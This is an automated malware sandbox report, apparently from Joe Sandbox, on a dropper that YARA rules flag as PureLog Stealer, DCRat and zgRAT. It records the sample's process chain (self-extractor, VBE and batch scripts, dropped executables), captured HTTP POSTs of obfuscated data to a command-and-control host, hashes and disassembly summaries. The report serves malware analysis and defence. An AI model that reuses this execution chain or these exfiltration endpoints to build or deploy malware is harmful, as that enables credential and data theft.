Jan 9, 2025 18:14:00.288491964 CET	809	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 17:14:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vQwEDj3Xqt%2BcpDlmIfkI80s0hES2RK9hDCe2nuEJ9PxQ0UnPXi%2B0iryKkwdklwFnPXHIQgVoIoW6%2BDuF4mDJ%2FxV%2FBrgUkzqK7KKODB3tLInfdeHXMV47Ll9S6OR9D6sqrwUMKi4a"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff60fa5c95cefa1-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=8132&min_rtt=1965&rtt_var=13072&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1337&delivery_rate=28457&cwnd=164&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 34 57 58 50 0d 0a 30 0d 0a 0d 0a Data Ascii: 44WXP0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
138	192.168.2.4	50140	104.21.38.84	80	7948	C:\Recovery\WBnjVTGHzbhirvM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 18:14:00.419193983 CET	325	OUT	POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 517300cm.renyash.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Jan 9, 2025 18:14:00.769623995 CET	1012	OUT	Data Raw: 50 53 5b 59 5d 47 55 57 59 58 51 54 5b 53 57 50 5f 53 58 5b 52 5d 5a 44 5e 5b 59 5c 51 53 5e 58 5c 5e 51 56 5a 53 53 5a 5e 59 5c 50 5a 54 5e 58 52 5a 5b 5d 59 58 54 5b 59 5f 57 5e 5e 5d 5c 42 58 5b 5e 5f 5f 5e 50 51 58 52 42 5f 5c 5c 5f 51 51 58 Data Ascii: PS[Y]GUWYXQT[SWP_SX[R]ZD^[Y\QS^X\^QVZSSZ^Y\PZT^XRZ[]YXT[Y_W^^]\BX[^__^PQXRB_\\_QQXW]Q^Z_WUV]B^QUX\XSYQ\XU[\^XUBUQZPX]^VSTT^SYUBYXZV_S_[XYT[WWSZXT\TRQUWXB[XS^][P_XZHVRU^^XQ\Y[_Q[[Z^^\]Z#_=-\#>^=U<;^77+]=,R!>>&U$+0!?(*'\"/Y.8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
139	192.168.2.4	50141	104.21.38.84	80	7948	C:\Recovery\WBnjVTGHzbhirvM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 18:14:00.825093031 CET	325	OUT	POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 517300cm.renyash.ru Content-Length: 1292 Expect: 100-continue Connection: Keep-Alive
Jan 9, 2025 18:14:01.178491116 CET	1292	OUT	Data Raw: 55 53 5b 55 58 41 50 52 59 58 51 54 5b 54 57 55 5f 5d 58 55 52 5b 5a 40 5e 5b 59 5c 51 53 5e 58 5c 5e 51 56 5a 53 53 5a 5e 59 5c 50 5a 54 5e 58 52 5a 5b 5d 59 58 54 5b 59 5f 57 5e 5e 5d 5c 42 58 5b 5e 5f 5f 5e 50 51 58 52 42 5f 5c 5c 5f 51 51 58 Data Ascii: US[UXAPRYXQT[TWU_]XUR[Z@^[Y\QS^X\^QVZSSZ^Y\PZT^XRZ[]YXT[Y_W^^]\BX[^__^PQXRB_\\_QQXW]Q^Z_WUV]B^QUX\XSYQ\XU[\^XUBUQZPX]^VSTT^SYUBYXZV_S_[XYT[WWSZXT\TRQUWXB[XS^][P_XZHVRU^^XQ\Y[_Q[[Z^^\]Z#*U=^#Z2]?0#[-(X#5')?!V1-1;Z4/#?'\"/Y.$
Jan 9, 2025 18:14:01.282294989 CET	25	IN	HTTP/1.1 100 Continue
Jan 9, 2025 18:14:01.618835926 CET	948	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 17:14:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OVGa%2BG6htL61KIla8lOwKqwnm5vmLR0bYo0hEJdY8kp3Wg9dWtelukT53PNtK5dJOw4K4HHiJ%2BhvFJTK2uzdcloXdIF8Z3mnGkkxOcOBwhxl3P23igS%2FW2qUfGGGyla7B4lpsJDl"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff60fadbe1cefa5-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=3591&min_rtt=1901&rtt_var=4093&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1617&delivery_rate=94669&cwnd=202&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 39 38 0d 0a 06 1f 21 5c 26 0b 3f 52 30 02 33 54 31 1f 0f 50 21 1f 22 15 3b 2e 0a 45 37 29 3f 1b 2d 21 31 10 35 01 34 06 27 0b 2d 1a 25 12 0e 0f 36 0c 21 5d 01 12 27 03 24 5f 2a 5c 27 00 02 5b 27 38 2f 09 23 2d 34 5e 30 15 00 51 32 0a 34 54 22 3d 22 0c 3d 03 31 5d 2d 3c 38 1b 2f 27 30 5a 28 13 2b 51 0e 10 21 09 30 3d 3e 5f 3c 07 27 5a 26 22 24 1e 29 3f 0d 13 25 12 28 1c 29 39 3c 10 27 17 3b 07 20 3c 2c 5e 2b 14 0e 5a 33 16 22 08 3e 38 20 5c 2e 00 2d 52 04 3e 54 50 0d 0a Data Ascii: 98!\&?R03T1P!";.E7)?-!154'-%6!]'$_*\'['8/#-4^0Q24T"="=1]-<8/'0Z(+Q!0=>_<'Z&"$)?%()9<'; <,^+Z3">8 \.-R>TP
Jan 9, 2025 18:14:01.717123032 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
140	192.168.2.4	50142	104.21.38.84	80	7948	C:\Recovery\WBnjVTGHzbhirvM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 18:14:00.895303011 CET	325	OUT	POST /pipeJavascriptDefaulttrafficWp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 517300cm.renyash.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Jan 9, 2025 18:14:01.253534079 CET	1012	OUT	Data Raw: 55 55 5e 5e 58 45 55 51 59 58 51 54 5b 50 57 53 5f 54 58 5d 52 5a 5a 47 5e 5b 59 5c 51 53 5e 58 5c 5e 51 56 5a 53 53 5a 5e 59 5c 50 5a 54 5e 58 52 5a 5b 5d 59 58 54 5b 59 5f 57 5e 5e 5d 5c 42 58 5b 5e 5f 5f 5e 50 51 58 52 42 5f 5c 5c 5f 51 51 58 Data Ascii: UU^^XEUQYXQT[PWS_TX]RZZG^[Y\QS^X\^QVZSSZ^Y\PZT^XRZ[]YXT[Y_W^^]\BX[^__^PQXRB_\\_QQXW]Q^Z_WUV]B^QUX\XSYQ\XU[\^XUBUQZPX]^VSTT^SYUBYXZV_S_[XYT[WWSZXT\TRQUWXB[XS^][P_XZHVRU^^XQ\Y[_Q[[Z^^\]Z#>#%\#<*^)7Y/87]4#>:$!=&&#%W1;#Z7<8?:'\"/Y.4
Jan 9, 2025 18:14:01.523580074 CET	25	IN	HTTP/1.1 100 Continue
Jan 9, 2025 18:14:01.740621090 CET	812	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 17:14:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=A5Z3I5fzyhOc8QR%2FWmtvgZv41AkiYk5pxyV1XxknIHxDh1SXvxPJ3Kb%2B8RunlWk%2Bo%2BxFHPg7h0Z7yZKW%2FfzuleoZjCPeM0QXw6BFqY7767DD89LGARJg%2FcxfmU6RgO3UkUBqooCI"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff60faefdbac337-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=10736&min_rtt=2256&rtt_var=17806&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1337&delivery_rate=20828&cwnd=207&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 34 57 58 50 0d 0a 30 0d 0a 0d 0a Data Ascii: 44WXP0

Target ID:	0
Start time:	12:11:54
Start date:	09/01/2025
Path:	C:\Users\user\Desktop\0V2JsCrGUB.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\0V2JsCrGUB.exe"
Imagebase:	0x340000
File size:	2'237'197 bytes
MD5 hash:	4E9DDBFBEB41BD97825E0F79426307CB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000003.1648958225.00000000065F4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000003.1649569498.0000000004F31000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	12:11:55
Start date:	09/01/2025
Path:	C:\Windows\SysWOW64\wscript.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WScript.exe" "C:\winRefruntime\0jfMNzpItgnyb3dolhtjTtJBeKE8V11tqFqpGcy14sQRgDlNdePdmeq.vbe"
Imagebase:	0x8f0000
File size:	147'456 bytes
MD5 hash:	FF00E0480075B095948000BDC66E81F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	12:12:03
Start date:	09/01/2025
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\winRefruntime\T8Mz9n0cgvFWE.bat" "
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	12:12:03
Start date:	09/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	12:12:03
Start date:	09/01/2025
Path:	C:\winRefruntime\MsAgentDriverruntime.exe
Wow64 process (32bit):	false
Commandline:	"C:\winRefruntime/MsAgentDriverruntime.exe"
Imagebase:	0x810000
File size:	1'915'392 bytes
MD5 hash:	C3A0C717ED8A025658E5A4C0F53281D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000004.00000000.1739595481.0000000000812000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000004.00000002.1776692230.0000000012F8C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\winRefruntime\MsAgentDriverruntime.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\winRefruntime\MsAgentDriverruntime.exe, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 66%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	12:12:07
Start date:	09/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\ani1HH9Yqa.bat"
Imagebase:	0x7ff632660000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	12:12:07
Start date:	09/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	12:12:07
Start date:	09/01/2025
Path:	C:\Windows\System32\chcp.com
Wow64 process (32bit):	false
Commandline:	chcp 65001
Imagebase:	0x7ff73d5f0000
File size:	14'848 bytes
MD5 hash:	33395C4732A49065EA72590B14B64F32
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	12:12:07
Start date:	09/01/2025
Path:	C:\Windows\System32\w32tm.exe
Wow64 process (32bit):	false
Commandline:	w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Imagebase:	0x7ff7ef1d0000
File size:	108'032 bytes
MD5 hash:	81A82132737224D324A3E8DA993E2FB5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	12:12:12
Start date:	09/01/2025
Path:	C:\Recovery\WBnjVTGHzbhirvM.exe
Wow64 process (32bit):	false
Commandline:	"C:\Recovery\WBnjVTGHzbhirvM.exe"
Imagebase:	0x2d0000
File size:	1'915'392 bytes
MD5 hash:	C3A0C717ED8A025658E5A4C0F53281D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000000B.00000002.2913344594.0000000002C30000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000000B.00000002.2913344594.00000000028A7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000000B.00000002.2913344594.0000000002DB1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Recovery\WBnjVTGHzbhirvM.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\WBnjVTGHzbhirvM.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\WBnjVTGHzbhirvM.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\WBnjVTGHzbhirvM.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\WBnjVTGHzbhirvM.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\WBnjVTGHzbhirvM.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\WBnjVTGHzbhirvM.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\WBnjVTGHzbhirvM.exe, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Avira Detection: 100%, Avira Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 100%, Joe Sandbox ML Detection: 100%, Joe Sandbox ML Detection: 100%, Joe Sandbox ML Detection: 66%, ReversingLabs
Reputation:	low
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	9.6%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	9.2%
Total number of Nodes:	1503
Total number of Limit Nodes:	28

Executed Functions

Function 0035DF1E Relevance: 42.2, APIs: 17, Strings: 7, Instructions: 195
filesleeptimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00350863: GetModuleHandleW.KERNEL32(kernel32), ref: 0035087C
Part of subcall function 00350863: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0035088E
Part of subcall function 00350863: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 003508BF

Part of subcall function 0035A64D: GetCurrentDirectoryW.KERNEL32(?,?), ref: 0035A655

Part of subcall function 0035AC16: OleInitialize.OLE32(00000000), ref: 0035AC2F
Part of subcall function 0035AC16: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0035AC66
Part of subcall function 0035AC16: SHGetMalloc.SHELL32(00388438), ref: 0035AC70

GetCommandLineW.KERNEL32 ref: 0035DF5C
OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 0035DF83
MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 0035DF94
UnmapViewOfFile.KERNEL32(00000000), ref: 0035DFCE

Part of subcall function 0035DBDE: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 0035DBF4
Part of subcall function 0035DBDE: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0035DC30

CloseHandle.KERNEL32(00000000), ref: 0035DFD7
GetModuleFileNameW.KERNEL32(00000000,0039EC90,00000800), ref: 0035DFF2
SetEnvironmentVariableW.KERNEL32(sfxname,0039EC90), ref: 0035DFFE
GetLocalTime.KERNEL32(?), ref: 0035E009
_swprintf.LIBCMT ref: 0035E048
SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 0035E05A
GetModuleHandleW.KERNEL32(00000000), ref: 0035E061
LoadIconW.USER32(00000000,00000064), ref: 0035E078
DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001B7E0,00000000), ref: 0035E0C9
Sleep.KERNEL32(?), ref: 0035E0F7
DeleteObject.GDI32 ref: 0035E130
DeleteObject.GDI32(?), ref: 0035E140
CloseHandle.KERNEL32 ref: 0035E183

Strings

STARTDLG, xrefs: 0035E0BE
xz9, xrefs: 0035E10B
sfxname, xrefs: 0035DFF9
winrarsfxmappingfile.tmp, xrefs: 0035DF77
sfxstime, xrefs: 0035E055
%4d-%02d-%02d-%02d-%02d-%02d-%03d, xrefs: 0035E039
C:\Users\user\Desktop, xrefs: 0035DF33

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$CommandCurrentDialogDirectoryGdiplusIconInitializeLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp$xz9
API String ID: 3049964643-189405298
Opcode ID: 4a428b16a8247748b7f81b7bdd1c1b80f05536e7ae7e5990506ac69ca4944fac
Instruction ID: f84dadb8b18c88be876af83d652b6ce021891492b9f7e40114e087ccbdbd592c
Opcode Fuzzy Hash: 4a428b16a8247748b7f81b7bdd1c1b80f05536e7ae7e5990506ac69ca4944fac
Instruction Fuzzy Hash: A361D371904344AFD333AB75DC49F6B77ECAB44702F00042AFD4A962B1DB789A48D762

Function 0035A6C2 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 100
memorywindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,0035B73D,00000066), ref: 0035A6D5
SizeofResource.KERNEL32(00000000,?,?,?,0035B73D,00000066), ref: 0035A6EC
LoadResource.KERNEL32(00000000,?,?,?,0035B73D,00000066), ref: 0035A703
LockResource.KERNEL32(00000000,?,?,?,0035B73D,00000066), ref: 0035A712
GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,0035B73D,00000066), ref: 0035A72D
GlobalLock.KERNEL32(00000000), ref: 0035A73E
CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 0035A762
GlobalUnlock.KERNEL32(00000000), ref: 0035A7C6

Part of subcall function 0035A626: GdipAlloc.GDIPLUS(00000010), ref: 0035A62C

GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 0035A7A7
GlobalFree.KERNEL32(00000000), ref: 0035A7CD

Strings

PNG, xrefs: 0035A6C6
Fjun5, xrefs: 0035A762

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: Global$Resource$AllocCreateGdipLock$BitmapFindFreeFromLoadSizeofStreamUnlock
String ID: Fjun5$PNG
API String ID: 211097158-3541588617
Opcode ID: 60b68ae90e5c6e6c3100e2c6bbe6d44e0809609b2ee79f6979816723adb13bab
Instruction ID: 977b61862ed39f73a3f025d5c36ab5552d239b553572d3e9b5260da3c18cf58c
Opcode Fuzzy Hash: 60b68ae90e5c6e6c3100e2c6bbe6d44e0809609b2ee79f6979816723adb13bab
Instruction Fuzzy Hash: 06319275600702AFC7239F61DC48D1BBBBCEF88751F010618FC0982620EB31D948AA62

Function 0034A69B Relevance: 7.6, APIs: 5, Instructions: 105
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileW.KERNELBASE(?,?,?,?,?,?,0034A592,000000FF,?,?), ref: 0034A6C4

Part of subcall function 0034BB03: _wcslen.LIBCMT ref: 0034BB27

FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,0034A592,000000FF,?,?), ref: 0034A6F2
GetLastError.KERNEL32(?,?,00000800,?,?,?,?,0034A592,000000FF,?,?), ref: 0034A6FE
FindNextFileW.KERNEL32(?,?,?,?,?,?,0034A592,000000FF,?,?), ref: 0034A728
GetLastError.KERNEL32(?,?,?,?,0034A592,000000FF,?,?), ref: 0034A734

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: FileFind$ErrorFirstLast$Next_wcslen
String ID:
API String ID: 42610566-0
Opcode ID: 99d508aeec9664bf02fc1be1a2c26f5d711ac729399d6efa4b8adbcded9a1db8
Instruction ID: 49c8b98041cf64ba42c162846d6d067370ecfaf0d68ea72e6edaefa9f858d63d
Opcode Fuzzy Hash: 99d508aeec9664bf02fc1be1a2c26f5d711ac729399d6efa4b8adbcded9a1db8
Instruction Fuzzy Hash: 51419172900515ABCB26DF64CC84AE9B7B8FB48350F144196F95EE7200D734BE94CF90

Function 00367DEE Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,?,00367DC4,00000000,0037C300,0000000C,00367F1B,00000000,00000002,00000000), ref: 00367E0F
TerminateProcess.KERNEL32(00000000,?,00367DC4,00000000,0037C300,0000000C,00367F1B,00000000,00000002,00000000), ref: 00367E16
ExitProcess.KERNEL32 ref: 00367E28

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 978ff3fade45d5745b751d11789bf87afd5121f897ec74ba8741ef81a92ebdb7
Instruction ID: 2175f4e0b3ae24a2ddcd607e5c299d42a06903e4dd9ecc269433d442a4854bbb
Opcode Fuzzy Hash: 978ff3fade45d5745b751d11789bf87afd5121f897ec74ba8741ef81a92ebdb7
Instruction Fuzzy Hash: 0BE0B631104148ABCF236F64DD0DA8ABF6AEB50345F418464F81A8A136CB36DE96DA90

Function 0034848E Relevance: 2.5, APIs: 1, Instructions: 960COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00348493

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 2d1651c2ab2f27966ff90b88a9ee5039af4773678486c60175b5830c909ea38b
Instruction ID: ded46fb1fe562d75042a8d328eb9ca6bf1206759a458d74106081642fafc4d9a
Opcode Fuzzy Hash: 2d1651c2ab2f27966ff90b88a9ee5039af4773678486c60175b5830c909ea38b
Instruction Fuzzy Hash: B682C770904245AEDF17DF64C891BFEBBE9AF05300F0941B9E8499F252DB717A89CB60

